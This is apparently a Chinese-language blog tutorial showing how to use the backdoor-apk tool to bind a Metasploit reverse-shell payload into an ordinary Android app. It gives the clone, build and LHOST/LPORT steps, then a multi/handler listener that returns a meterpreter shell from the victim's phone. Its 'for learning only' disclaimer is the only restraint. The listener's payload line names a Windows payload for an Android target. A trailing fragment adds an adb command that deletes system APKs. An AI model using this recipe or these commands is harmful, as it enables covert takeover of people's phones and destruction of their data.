技术讲解-安卓APK快速生成后门(实现手机入侵)
Hello,朋友们大家好,欢迎来到LIUSE网络。
对于渗透测试来讲,一个成功的Backdoor(后门)是非常有价值的!那么今天Liuse就带领大家一起来学习基于安卓apk的后门制作。对于不知道什么是“后门”的同学,请去墙角面壁思过三分钟。
什么是后门:后门程序就是留在计算机系统中,供某位特殊使用者通过某种特殊方式控制计算机系统的途径。等于你买了开发商一套房子,开发商在你家后院挖了一条秘密通道,可以随时进出。
在常规情况下,如果我们要想将一个正常无毒的apk文件嵌入进去恶意代码、或者嵌入恶意payload的话那务必要我们动手先去反编译apk文件,找到文件执行入口,并在activety中添加启动PAYLOAD。这对于入门小白来讲是十分的费劲!如此说来,是不是就要凉凉了?NONONONO,接下来鄙人给大家介绍一款神器backdoor-apk!
backdoor-apk 从名字上我们就能猜到用途了,没错就是用来制作 APK 后门的。这个工具,非常简单易用,比手动去找关键点速度多了,完全傻瓜式操作!
首先,让我们对它进行安装,在安装前我们需要先安装它的一些依赖 lib 库文件:
注:这里推荐使用kali系统,后面要用到metasploit,如果你闲麻烦就用kali最方便,你要喜欢折腾用其它的也可以
apt-get install lib32stdc++6 lib32ncurses5 lib32z1 #安装lib依赖
这里询问我们,对这些安装的服务,当他们更新时不再进行询问。我们选择 Yes 即可!
在完成以上依赖库的安装后接着我们就可以安装 backdoor-apk 啦!
git clone https://github.com/dana-at-cp/backdoor-apk.git #从github下载程序源码
下载完成后我们进入到其文件目录下:
cd backdoor-apk/
cd backdoor-apk/
在当前目录下,我们可以看到一个脚本文件。这里,我们需要提前准备一个用来绑定后门的 APK 文件(这个文件是什么都可以,可以是企鹅、可以是K歌随你来)。
./backdoor-apk.sh /root/secist.apk #启动backdoor
选择 3 payload #选择攻击载荷
LHOST:192.168.15.131 #设置IP
LPORT:4444 #设置端口
成功执行以上操作后,会生成一个绑定后门的 secist.apk 文件,默认被保存在 backdoor-apk>>original>>dist 目录下!下面我们来启动侦听:
在kali打开metasploit
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.15.131
set lport 4444
exploit
同时,我将生成的带有后门的 APK 发送至我的手机,并进行安装打开!
如果没有出错的话,现在你的软件是可以正常使用的,只不过,在后台你植入的backdoor也已经运行起来了,并返回给指定地址一个shell。
打开软件后,很快的我们的kali下也会有提示并返回一个meterperter,这说明我们已经获取到shell了!
简单输入一个,查看系统信息的命令:
sysinfo
可以看到目标系统为 安卓6 版本,内核为 linux 3.10.49 架构为 armv7l 。
注:文章有一定攻击性,旨在学习网络安全。请大家在虚拟环境下测试,切勿用于违法犯罪!维护网络安全,是你我共同的责任!
——以上部分素材来自“即刻安全”。
相关推荐
adb shell cd system/app rm *.apk21. 获取管理员权限: adb root22. 启动Activity: adb shell am start -n 包名/包名+类名。